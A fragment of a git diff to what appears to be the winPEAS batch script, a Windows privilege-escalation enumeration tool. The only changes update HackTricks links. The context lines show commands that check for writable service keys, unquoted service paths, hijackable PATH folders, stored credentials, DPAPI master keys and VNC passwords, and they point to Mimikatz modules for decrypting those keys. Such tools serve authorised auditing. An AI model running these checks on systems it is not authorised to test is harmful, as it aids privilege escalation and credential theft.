https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a ECHO. CALL :T_Progress 1 @@ -453,7 +453,7 @@ CALL :T_Progress 1 CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS" ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe' ECHO. [i] The permissions are also checked and filtered using icacls -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do ( ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO. @@ -468,7 +468,7 @@ ECHO. CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable" ECHO. [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations ECHO. [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. ) ECHO. CALL :T_Progress 1 @@ -477,7 +477,7 @@ CALL :T_Progress 1 CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS" ECHO. CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT" -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#windows-vault cmdkey /list ECHO. CALL :T_Progress 2 @@ -485,14 +485,14 @@ CALL :T_Progress 2 :DPAPIMasterKeys CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS" ECHO. [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul CALL :T_Progress 2 CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS" ECHO. [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt ECHO. [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi ECHO. ECHO.Looking inside %appdata%\Microsoft\Credentials\ ECHO. @@ -565,7 +565,7 @@ CALL :T_Progress 2 :AppCMD CALL :ColorLine " %E%33m[+]%E%97m AppCmd" -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists. ECHO. CALL :T_Progress 2 @@ -573,7 +573,7 @@ CALL :T_Progress 2 :RegFilesCredentials CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials" ECHO. [i] Searching specific files that may contains credentials. -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files +ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password reg query HKCU\Software\ORL\WinVNC3\Password 2>nul CALL :T_Progress 2 diff --git a/win/winPEAS.exe b/win/winPEAS.exe index 9fe0a00..d9048e7 100644 Binary files a/win/winPEAS.exe and b/win/winPEAS.exe differ diff --git a/win/winPEASx64.exe b/win/winPEASx64.exe index 3cc39ba..9e01878 100644 Binary files a/win/winPEASx64.exe and b/win/winPEASx64.exe differ